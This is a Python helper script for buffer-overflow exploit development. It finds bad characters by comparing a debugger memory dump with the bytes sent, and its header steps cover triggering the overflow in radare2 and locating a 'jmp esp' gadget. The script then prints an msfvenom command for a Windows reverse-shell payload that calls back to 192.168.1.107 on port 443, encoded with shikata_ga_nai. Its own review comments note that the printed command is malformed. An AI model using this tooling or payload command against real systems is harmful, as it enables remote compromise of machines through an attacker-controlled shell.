#!/usr/bin/env python
# -*- coding: utf-8 -*-
#usage
#1.trigger the bof with radare2 attached
#2.get the esp address by dr and s addr
#3.p8 @address > 1.txt
#4.copy to the output variable until the closest string to 0xff or up to 0xff
#5 find gadget /R jmp esp
#get pattern
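# Python 2 era script (print statements, integer "/" indexing in the original);
# rewritten to run unchanged on both Python 2 and 3, so no type annotations.

# Command template printed at the end.  Kept byte-for-byte from the original,
# including the U+2013 dash before "e" (see build_msfvenom_cmd).
_CMD_TEMPLATE = "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.107 LPORT=443 -f c –e x86/shikata_ga_nai -b \""


def find_badchars(output, expected=None):
    """Compare a hex dump of the buffer in memory against the bytes sent.

    Args:
        output: hex text copied from the debugger, two characters per byte
            and no separators (usage step 4).  May be empty.
        expected: the integer byte values that were sent, in order.  Defaults
            to 1..0xff; 0x00 is not sent and is always reported as bad.

    Returns:
        (badchar, become): badchar is the list of sent bytes (as one-character
        strings, chr(0) first) that did not arrive intact; become lists the
        distinct bytes they turned into, in order of first appearance.

    A pair that is not valid hex, or a dump longer than the sent sequence, is
    skipped (the original swallowed those errors with a bare except; here only
    ValueError/IndexError are caught so genuine bugs still surface).
    """
    if expected is None:
        expected = list(range(1, 0xff + 1))
    badchar = [chr(0)]
    become = []
    for pos in range(0, len(output), 2):
        pair = output[pos:pos + 2]
        try:
            seen = int("0x" + pair, 16)
            # "//" keeps this an int index on Python 3 (the original's "/"
            # produced a float there and every iteration was silently skipped).
            sent = expected[pos // 2]
        except (ValueError, IndexError):
            continue
        if seen != sent:
            badchar.append(chr(sent))
            arrived_as = chr(seen)
            if arrived_as not in become:
                become.append(arrived_as)
    return badchar, become


def build_msfvenom_cmd(badchar, become):
    """Assemble the command line the original script printed.

    The template, the order of the appended bytes and the trailing
    " -f python" are reproduced exactly.

    NOTE(review): as in the original, the bytes are appended as raw characters
    rather than hex escapes, the quote opened after -b is never closed, "-f" is
    given twice and the dash before "e" is U+2013 rather than "-"; the printed
    line is therefore not a valid argument list as-is.  Left unchanged here.
    """
    parts = [_CMD_TEMPLATE]
    parts.extend(badchar)
    parts.extend(become)
    parts.append(" -f python")
    return "".join(parts)


def main():
    """Entry point: read the pattern file, compare the dump, print findings."""
    # The pattern file is read as in the original; its contents are not used
    # by the checks below.  "with" guarantees the handle is closed.
    with open("pattc10000") as fs:
        fs.read()
    # Paste the hex dump copied from the debugger here (usage step 4).
    output = ""
    badchar, become = find_badchars(output)
    print(badchar)
    print(become)
    print(build_msfvenom_cmd(badchar, become))


if __name__ == "__main__":
    main()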